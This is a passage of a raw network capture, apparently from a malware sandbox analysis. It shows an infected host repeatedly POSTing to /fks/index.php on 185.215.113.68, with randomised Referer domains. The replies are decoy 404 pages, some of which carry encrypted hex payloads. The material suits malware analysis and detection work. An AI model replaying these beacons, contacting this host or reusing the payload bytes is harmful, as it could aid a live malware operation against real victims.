request.</p><hr></body></html>0
Dec 27, 2023 17:57:36.725727081 CET	284	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xdkeilrqobhb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: 185.215.113.68
Dec 27, 2023 17:57:37.023159981 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 62 37 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0d e1 6b 24 20 85 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 25 3c ff e5 84 e4 d3 18 7b 4d 8a a4 75 b4 a3 83 06 21 6f 40 51 f8 43 6b 14 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 67 97 24 47 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f cb d0 63 1a f8 bc 40 de dc fb 5d 56 9f 19 f6 ca 71 83 e8 b9 5f a5 70 18 93 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 22 97 af a6 7b b2 16 ce a4 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 80 dc 99 e8 b1 55 84 3a a6 f9 1a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ac 0c ac 6f 30 79 fe 76 7d e1 47 e4 3c 5b 53 e2 23 df 87 b4 03 85 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c 79 d3 19 09 04 07 25 fd 99 04 b9 3f 94 63 81 3b c2 75 a6 fc 29 2a 89 89 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 5b 82 36 53 65 d3 bf 08 48 f4 cc 76 de 0c 51 2e 02 b8 5d 68 3b 0e fa 50 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 cf e7 24 bd 70 73 3e 3f 45 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 5c 7a 07 d0 70 af 67 57 ec f4 d1 d3 cd b3 5b 17 9a ee b7 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2a 59 d6 44 0d 6d 83 f7 65 9f fa c4 bd 7e 05 26 81 94 ad 86 cc 81 8a c3 6a c4 96 a5 64 b8 ab af 4e 15 68 64 c6 16 36 a7 34 25 0d 54 2c b7 9f 75 23 70 1e 6f f2 08 9d 01 e4 b1 bd af ae 2e bb 89 19 52 30 a6 36 d1 e5 96 a7 ca 16 09 8f 78 e6 20 c3 59 1e fb 6e 71 9d f5 7e e0 04 be e1 b8 1c f2 6d 63 53 3d 7c be 04 71 64 fa 01 01 b8 fb cd 55 6f 80 cb 0c 3d 0f 13 b2 43 44 1a 70 7c 03 d1 0b c5 43 6c fd 3d 48 22 b4 58 56 ba 4f 86 ac 76 16 d7 a2 dc c3 60 2b 71 16 50 bc ea f9 e8 6e 60 d5 43 48 49 2a 0b Data Ascii: 1fb7}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfk$ !%<{Mu!o@QCk@3sPu-\T+g$G/}t<KL<Qrk5c@]Vq_psvaaAJ,"{+xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:O'%LQ2u6o0yv}G<[S#@7$lRN9Ly%?c;u)d!b~(O[6SeHvQ.]h;PJ]t,n C$ps>?E3YF w0+.2+u0Pjryh ,Dz\zpgW[d#QyHK,mc-9q`GFraF'pDU<-{T&U<U'CnC?UcGj"#rZht=RPhs.njidufy5OTh5.xjNTHx@`v,UrU9^>82G0!oy_jU_u]}kFK+aZ403a1)uIc,]t\|;YDme~&jdNhd64%T,u#po.R06x Ynq~mcS=\|qdUo=CDp\|Cl=H"XVOv`+qPn`CHI
Dec 27, 2023 17:57:41.198051929 CET	284	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dcrrthenfkci.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: 185.215.113.68
Dec 27, 2023 17:57:41.494699001 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:41.537523031 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yyifqiwelrqsscl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: 185.215.113.68
Dec 27, 2023 17:57:41.836621046 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 c1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 ab 83 b0 ff 2a b3 09 e1 5f 13 27 2c b1 fb 9e 1a 14 f1 c9 e9 c1 0c f1 1b a8 05 23 3c ff 45 d5 e4 d3 c4 7a 4d 8a a4 75 b4 1d 3d 57 21 6f 60 51 f8 43 ab 45 cb 12 84 4f da 06 d9 b5 40 33 1c 73 50 71 9d 0d 97 2d a0 f8 5c 17 54 09 11 89 d2 af 2b e4 42 34 97 24 43 7f fe b3 ae 2f 7d c5 74 97 19 3c 4b c5 4c 11 86 84 3c 18 51 62 0c 6b 86 35 f0 b8 5e 7f 1f 88 d1 67 1a 47 ba ad bd dc fb 5d 56 ef a7 a7 ca da 83 eb b8 54 44 28 18 ef f2 90 8d 8b 03 de cc 76 61 e6 96 ce e0 61 ed 41 d3 4a 2c ff 0f 75 97 a3 a6 3b b2 1c 60 f5 92 37 cd ad 86 7d 68 90 77 1f b9 2d 53 6c c2 52 67 3a 85 75 20 6a d8 05 46 f2 fc 3e 7e 88 02 f4 b6 7e 90 41 40 c6 74 50 e5 bf ff 87 b0 6d 45 94 46 2b b2 59 3e 35 26 1f 18 d2 2b fd 11 df 00 0b bd 33 f6 3e 06 ef 9b f2 1d 66 7c 1b 4c 9b 93 8c e9 71 6c d3 08 44 42 c8 e8 b1 75 84 3a a6 59 4b 89 4f 23 25 db db 1c 4c 13 b7 f6 51 cc cb e3 f4 75 bd 93 f1 ba 18 df 68 cd 1b 51 79 fe ce 72 e1 47 e4 fc 0a 53 e2 33 df 87 b4 a7 d4 86 c2 26 44 c7 77 18 24 6c 52 c2 4e 14 c6 39 4c b9 fd bb 7e 76 fc 24 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd d6 16 1b 50 7b fa ad 1b ac f3 32 09 bc cc 08 48 f8 74 72 de 0c 95 7d 02 b8 5f 68 3b 0e 84 03 b9 4a 5d 17 74 d9 ce 9e b2 90 cc 48 0f 14 22 02 8d d9 07 bd 70 73 ee 3b 45 92 3c c9 cc bb 61 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 bf 82 20 c6 84 b6 a6 f2 84 9c 77 30 56 2a e1 d7 e3 0b 2b d2 e4 26 1a 0c a4 69 88 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 28 1b 0e e0 02 36 8e 08 3f 7a 07 d0 e8 a3 65 57 ec e4 96 d3 cd bd 59 17 9a 1a b3 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 6c b7 6d 23 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2a 59 d6 44 0d 6d 83 f7 65 9f fa c4 bd 7e 05 26 81 94 ad 86 cc 81 8a c3 6a c4 96 a5 64 b8 ab af 4e 15 68 64 c6 16 36 a7 34 25 0d 54 2c b7 9f 75 23 70 1e 6f f2 08 9d 01 e4 b1 bd af ae 2e bb 89 19 52 30 a6 36 d1 e5 96 a7 ca 16 09 8f 78 e6 20 c3 59 1e fb 6e 71 9d f5 7e e0 04 be e1 b8 1c f2 6d a5 66 64 1a 37 0e b2 a8 7e cd cd 74 35 01 9c a3 19 65 58 bb 01 e9 63 8f 8b d6 bc b0 85 1d c7 0f 1c 25 3a 09 8b 90 5c 94 9a 76 83 4a 60 ba da 1b f7 57 2f e1 c7 5d 1e 50 bc 6b c4 88 6e e7 d5 d7 4d 49 2a 80 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-r_',#<EzMu=W!o`QCEO@3sPq-\T+B4$C/}t<KL<Qbk5^gG]VTD(vaaAJ,u;`7}hw-SlRg:u jF>~~A@tPmEF+Y>5&+3>f\|LqlDBu:YKO#%LQuhQyrGS3&Dw$lRN9L~v$xp>cajul)=d!P{2Htr}_h;J]tH"ps;E<a3YF w0V+&i+u0Pjry(6?zeWYd#QyHKlm#-9q`GFraF'pDU<-{T&U<U'CnC?UcGj"#rZht=RPhs.njidufy5OTh5.xjNTHx@`v,UrU9^>82G0!oy_jU_u]}kFK+aZ403a1)uIc,]t\|;YDme~&jdNhd64%T,u#po.R06x Ynq~mfd7~t5eXc%:\vJ`W/]PknMI
Dec 27, 2023 17:57:42.896626949 CET	284	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xivusukrsqch.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 324 Host: 185.215.113.68
Dec 27, 2023 17:57:43.193550110 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:43.259659052 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vdgqkaydivswsat.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: 185.215.113.68
Dec 27, 2023 17:57:43.556521893 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:43.589960098 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lfejpsdmhplqxw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: 185.215.113.68
Dec 27, 2023 17:57:43.887249947 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:43 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:43.962914944 CET	288	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://epjaefglhmpltywq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: 185.215.113.68
Dec 27, 2023 17:57:44.259747982 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 01 68 78 48 b1 fb 9e 1a 14 f1 c9 e9 21 0c f3 1a a3 04 28 3c ff 5b d0 e4 d3 a2 7a 4d 8a a4 75 b4 43 01 52 21 6f 40 51 f8 43 eb 40 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 ff 9b a2 ca 71 83 e8 b9 5f 05 24 18 f7 29 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 20 5e cd e8 b1 55 84 3a a6 47 4e 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe d6 11 e1 47 e4 bc 0f 53 e2 57 df 87 b4 87 d1 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 a1 6f c2 75 6e fd 29 2a b9 dd 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 f8 63 6d 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 fa 97 29 6e ac 51 02 8d e6 24 bd 70 7b 3e 3f 43 d2 34 c9 cc bf 20 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 55 d4 6a 72 f3 79 9b 1d 68 65 1e 20 2c 4e f7 79 22 6a 07 d0 7a 87 76 57 ec fe fd d5 c9 a5 a5 16 b1 ef a0 0f 77 33 40 69 72 55 bb 11 0f e4 4f 38 a1 a2 6d 63 2c 32 02 8b a4 b7 13 15 0e ce 8a 0b 48 04 13 47 4c d7 76 bf b6 94 ec 9f f5 aa b8 26 e6 fe ce 60 20 fa 15 e5 44 55 23 f6 a0 6e 54 f6 04 d0 18 d1 38 33 c8 c9 54 d6 c6 4f 41 27 43 64 c7 46 f0 3c 9d c1 51 b9 72 11 51 c3 f9 e6 7f 22 e9 29 f1 0c 91 a2 85 5e 91 70 a5 62 22 42 c4 45 f6 ab 87 68 0a 76 2b 79 ef 2e ce ad 78 6a 69 6e 75 77 06 c2 f9 35 4f b0 93 43 10 68 3f d2 85 0b f8 fa e3 95 14 a7 81 d1 b9 da 41 61 6a da 44 54 ee e2 1d 4c e3 e5 17 cf 0c ec 0a 7d e1 d0 5b 83 0e f5 e2 fe 83 0f 6a a1 2a 17 d2 2a 44 74 95 84 c3 db c6 64 24 db cb 54 be 8b e4 f7 ab af 89 df 8c e1 b5 2d 3f b9 35 53 46 31 32 ba 7e 15 54 13 0f cf 6a 45 0a 5f 3d d2 ee 75 9b eb b1 76 52 6b 57 4c 93 23 fc fd 61 b8 5a 12 6c 30 34 db 9e e3 c6 e2 bd 0f ce e3 25 05 60 16 f8 0e 21 c5 a4 f1 a3 0b f9 aa b5 38 7c d5 68 63 2c b3 89 fd ec c6 4d 25 b8 1e 88 81 5e f6 aa fb 3b 2a 59 de 2b 2e 6d 83 fd 73 f5 04 c6 ab 80 04 35 91 85 bd bc 6d 81 8a c3 6a ec b2 a5 64 b2 b5 81 4d 02 43 65 de 16 e4 b4 3e 2d 7e 71 2c b7 95 66 28 78 08 05 9d 2e 9d 01 ee b1 96 ce ae 26 d4 ae 19 52 3a 74 25 dd f4 9d c8 e2 16 09 85 6b eb 31 ce d4 0b fb 6e 70 8e fb 76 f1 0a a8 f0 b5 73 d2 6d c3 e7 7d 71 40 05 62 74 a3 11 2c ba d2 8f 41 63 89 6f 2c 33 d8 85 80 43 57 1a 70 82 4b c7 f5 c2 b6 24 cc 3d 77 46 8e 48 7b ab 4f 97 a2 60 14 c6 af f4 